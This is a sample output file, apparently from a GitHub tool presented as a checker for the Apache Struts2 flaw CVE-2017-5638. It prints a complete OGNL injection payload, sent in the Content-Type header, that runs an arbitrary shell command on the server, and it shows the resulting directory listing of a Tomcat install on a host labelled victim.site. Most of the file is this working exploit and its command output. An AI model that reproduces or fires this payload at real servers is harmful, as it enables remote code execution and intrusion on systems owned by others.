-
Notifications
You must be signed in to change notification settings - Fork 25
/
sample-output.txt
47 lines (35 loc) · 2.95 KB
/
sample-output.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
Check for CVE-2017-5638 by XSS.Cx
[*] Checking Site....
[*] cmd: dir
('https://victim.site', 'dir')
Object get.request aka Response Code
<Response [200]>
PAYLOAD SENT
%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='dir').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
Object request.URL
https://victim.site
Object request.headers
{'Date': 'Fri, 10 Mar 2017 17:05:18 GMT', 'Connection': 'close', 'Content-Length': '845', 'Server': 'Microsoft-IIS/8.5'}
Object request.request
<PreparedRequest [GET]>
Object headers
{'Content-Type': "%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='dir').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}", 'User-Agent': 'Mozilla/5.0'}
Object request.TEXT aka This is what you are looking for...
Volume in drive D has no label.
Volume Serial Number is 2A7B-A245
Directory of d:\Program Files\Apache Software Foundation\Tomcat 9.0
06/07/2016 04:39 PM <DIR> .
06/07/2016 04:39 PM <DIR> ..
06/07/2016 04:39 PM <DIR> bin
12/07/2016 12:42 PM <DIR> conf
06/07/2016 04:39 PM <DIR> lib
05/11/2016 04:44 PM 58,153 LICENSE
03/10/2017 01:18 AM <DIR> logs
05/11/2016 04:44 PM 1,859 NOTICE
09/23/2016 07:58 AM <DIR> temp
05/11/2016 04:44 PM 21,630 tomcat.ico
05/11/2016 04:45 PM 74,202 Uninstall.exe
06/07/2016 04:39 PM <DIR> webapps
06/07/2016 04:39 PM <DIR> work
4 File(s) 155,844 bytes
9 Dir(s) 160,800,112,640 bytes free